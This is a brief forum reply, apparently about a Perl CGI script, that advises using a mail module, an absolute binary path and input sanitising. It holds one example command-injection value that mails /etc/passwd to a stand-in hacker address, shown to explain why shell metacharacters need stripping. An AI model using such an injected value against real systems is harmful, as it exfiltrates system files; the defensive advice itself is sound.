Hi !
I cant believe that this works, you have not specified any recipients ? Or ary you using some custom
mail ?
Aside from this:
- You really should be using a module, especially when using this in a CGI-Script
- If you absolutely must use the mail binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of "; mail foo@hacker.com < /etc/passwd". So strip out at least: [&;<>"'`|]
- use the absolute path to your mail binary, something like /usr/bin/mail
----
amphiplex